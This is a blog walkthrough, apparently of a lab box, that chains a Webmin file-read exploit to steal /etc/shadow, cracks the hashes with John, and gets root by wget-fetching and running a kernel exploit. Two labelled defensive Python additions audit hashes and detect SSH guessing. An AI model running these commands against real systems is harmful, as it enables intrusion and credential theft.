Webmin + John = root!

I wanted to do something different this week; however, the video I recorded crashed and didn’t save correctly. *sniffles* I will attempt to do a video this weekend since I have some extra time and get it uploaded for next week. I still wanted to do something, so I was going through some of my old notes and decided to write about an oldie but goodie.

Scenario:
I was approached by a mean kitteh. He said that if we can hack into his box, we can have all the beers we want. However, he said that if we cannot hack into his box, he will eat our faces and piss on our favorite Batman Chucks!! 🙁 Since I love beer, I figured why not.

After scanning the kitteh’s network, I came across the following port open on a host:

[Screenshot: Webmin on default port]

I wanted to make sure I could reach the victim on that port by visiting the IP:PORT in our browser. Since my other scans were not completed yet, I went to the Googles!! However, if I had previously scanned the victim with hydra or nessus, etc., maybe I was lucky enough to find weak passwords. If that is the case, the game is pretty much over, depending on how webmin was installed.

[Screenshot: default]

As you can see from the screenshot, webmin is running with root permissions, so we can execute any command that we want. However, if you aren’t that lucky, extra research can come in handy. I have identified that this version of webmin has a flaw that will allow us to retrieve files from the local system. This could come in handy! Of course, you can easily search the Internet and find many exploits or ways to hack this version of Webmin.

Now that we have done our research and have found a promising exploit, let’s get to work!!!

[Screenshot: perl]

Ok, from the exploit we see that the default values are:

url - victim url/ip
port - in most cases the default is "10000"
filename - the name of the file you are looking to retrieve
target - whether the victim uses HTTP or HTTPS

That seems simple enough. The easiest thing to do is to attempt to retrieve the “/etc/passwd” file. Since this file should be “world” accessible, it is a good first test.

[Screenshot: pass]

Awesome, looks like we can read the “/etc/passwd” file. Let’s see if we can read any other files, like the “/etc/shadow” file. 😉 YAY! We can read that file as well. Let’s save them to a file in preparation for our next step with john.

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/passwd 0 > passwd.txt

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/shadow 0 > shadow.txt

You may have to clean up the output a little.

Now that we have both files saved, we can use a cool utility that comes along with John the Ripper (JTR) called “unshadow”. Unshadow will take an “/etc/passwd” file and merge it with an “/etc/shadow” file and hopefully allow us to crack the passwords. Of course, this depends on how secure and complex the kitteh’s passwords are.

root@L4mers3c:~# unshadow passwd.txt shadow.txt > both.txt
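Seen from the defender's side, the merged file is only as useful as the stored hashes are weak. The following is an added example, not code from the original post: a simplified unshadow-style merge followed by an audit of each account's crypt(3) scheme. The account data, the placeholder hashes and the function names are constructed for illustration.

```python
# Added example, not from the original post. All account data is constructed.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
l4mers3c:x:500:500::/home/l4mers3c:/bin/bash
backup:x:501:501::/home/backup:/bin/bash
svc:x:502:502::/home/svc:/bin/bash
"""
SHADOW = """root:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:15987:0:99999:7:::
daemon:*:15987:0:99999:7:::
l4mers3c:$1$CONSTRSL$CONSTRUCTEDHASH:15987:0:99999:7:::
backup:ab0123456789.:15987:0:99999:7:::
svc::15987:0:99999:7:::
"""
# crypt(3) "$id$" prefix -> (scheme name, weak by current standards)
SCHEMES = {"1": ("md5crypt", True), "5": ("sha256crypt", False),
           "6": ("sha512crypt", False), "y": ("yescrypt", False),
           "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False)}

def classify(field):
    """Return (scheme, weak) for one password field."""
    if field == "":
        return "empty", True           # account needs no password
    if field[0] in "!*":
        return "locked", False         # password login disabled
    if field.startswith("$"):
        return SCHEMES.get(field.split("$")[1], ("unknown", True))
    if len(field) == 13:
        return "descrypt", True        # traditional DES crypt
    return "unknown", True

def unshadow(passwd_text, shadow_text):
    """Simplified unshadow-style merge: shadow hash goes into passwd field 2."""
    hashes = dict(l.split(":")[:2] for l in shadow_text.splitlines() if l.count(":") == 8)
    merged = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:            # skip debris left in the saved output
            continue
        parts[1] = hashes.get(parts[0], parts[1])
        merged.append(parts)
    return merged

def audit(merged):
    """List (user, scheme) for every account whose stored password is weak."""
    return [(p[0], classify(p[1])[0]) for p in merged if classify(p[1])[1]]

if __name__ == "__main__":
    for user, scheme in audit(unshadow(PASSWD, SHADOW)):
        print(f"{user}: {scheme}")
```
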

Now that both files are merged, we can attempt to crack them with JTR.

[Screenshot: john]

As you can see, we have cracked some of the really weak passwords. Hmmm! During scanning I noticed that SSH was running on this host. Let’s see if we can log in with one of the accounts that we have found.

[Screenshot: ssh]

Game Over!! Well, not really. If we look at our user permissions, we aren’t root! The kitteh said we cannot have a beer until we get root. We can go through the normal post exploitation steps and look for a local exploit.

[l4mers3c@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux
[l4mers3c@localhost ~]$

After searching on the Interwebz, we find that our victim is potentially vulnerable to the “Linux sock_sendpage() NULL pointer dereference” exploit. Let’s move it over to our victim and see what we can do.

root@L4mers3c:~# service apache2 start
[ ok ] Starting web server: apache2.
root@L4mers3c:~# searchsploit sock
Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit /linux/dos/274.c
XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit /linux/remote/296.c
Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit /windows/dos/682.c
Lithtech Engine (new protocol) Socket Unreacheable DoS /windows/dos/683.c
Gore <= 1.50 Socket Unreacheable Denial of Service Exploit /windows/dos/742.c
Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2 /linux/remote/785.c
Solaris SPARC / x86 Local Socket Hijack Exploit /solaris/local/1092.c
<snip>

Ok, we locate the exploit. Now we can copy it to our default web directory and then “wget” it from our victim machine.

root@L4mers3c:~# cp /usr/share/exploitdb/platforms/linux/local/9545.c /var/www/

Note: As always, I do everything in the “/tmp” directory, so make sure you are in that directory on the victim.

[l4mers3c@localhost tmp]$ wget http://192.168.160.159/9545.c

Now let’s compile it and run it.

[l4mers3c@localhost tmp]$ gcc -o sock 9545.c
[l4mers3c@localhost tmp]$ ./sock
sh-3.2# id
uid=0(root) gid=0(root) groups=500(l4mers3c)
sh-3.2# /bin/bash
[root@localhost tmp]#

BAM, we are root! Now we can change the password or add our ssh key to the victim. As promised, kitteh says we can have our beer.

[Image: beer]

You can also use metasploit’s “SSH-Login” utility and then follow the same procedures.

msf> use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set USERNAME l4mers3c
USERNAME => l4mers3c
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(ssh_login) > run -j
msf auxiliary(ssh_login) >
[*] Command shell session 2 opened (192.168.160.159:33277 -> 192.168.160.156:22) at 2013-10-09 22:39:49 -0400
[+] 192.168.160.156:22 SSH - [3/3] - Success: 'l4mers3c':'password' 'uid=500(l4mers3c) gid=500(l4mers3c) groups=500(l4mers3c) Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
msf auxiliary(ssh_login) > sessions -i 2
[*] Starting interaction with 2...
id
uid=500(l4mers3c) gid=500(l4mers3c) groups=500(l4mers3c)

If you want a prompt, we can use the old “pty” trick.

python -c 'import pty;pty.spawn("/bin/bash")'
[l4mers3c@localhost ~]$

Then you can attempt to use the local Linux exploits in MSF to get root or download the file to the tmp dir like we did earlier.
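The ssh_login run above reports success on its third attempt, and that pattern is visible on the server. The following is an added example, not code from the original post: it scans sshd authentication log lines for a password login that succeeds right after repeated failures from the same source. The log lines are constructed, the OpenSSH syslog message format is assumed, and the function name and threshold are hypothetical.

```python
# Added example, not from the original post. Log lines are constructed.
import re
from collections import defaultdict

AUTH_LOG = """\
Oct  9 22:39:41 localhost sshd[2101]: Failed password for l4mers3c from 192.168.160.159 port 33271 ssh2
Oct  9 22:39:45 localhost sshd[2103]: Failed password for l4mers3c from 192.168.160.159 port 33274 ssh2
Oct  9 22:39:49 localhost sshd[2105]: Accepted password for l4mers3c from 192.168.160.159 port 33277 ssh2
Oct  9 23:02:10 localhost sshd[2200]: Accepted publickey for admin from 192.168.160.10 port 50122 ssh2
Oct  9 23:05:00 localhost sshd[2210]: Failed password for invalid user test from 192.168.160.77 port 40100 ssh2
"""

# Matches OpenSSH "Failed|Accepted <method> for [invalid user] <user> from <ip>".
LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")


def guessed_logins(log_text, min_failures=2):
    """Return (src, user, failures) for each password login that succeeded
    after at least min_failures failed passwords from the same source."""
    failures = defaultdict(int)   # src -> failed passwords since last success
    hits = []
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m or m["method"] != "password":
            continue              # key-based logins are not guessable this way
        src = m["src"]
        if m["result"] == "Failed":
            failures[src] += 1
        else:
            if failures[src] >= min_failures:
                hits.append((src, m["user"], failures[src]))
            failures[src] = 0     # reset the streak after any accepted login
    return hits


if __name__ == "__main__":
    for src, user, count in guessed_logins(AUTH_LOG):
        print(f"ALERT {src} logged in as {user} after {count} failed passwords")
```
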

Until next time!!!
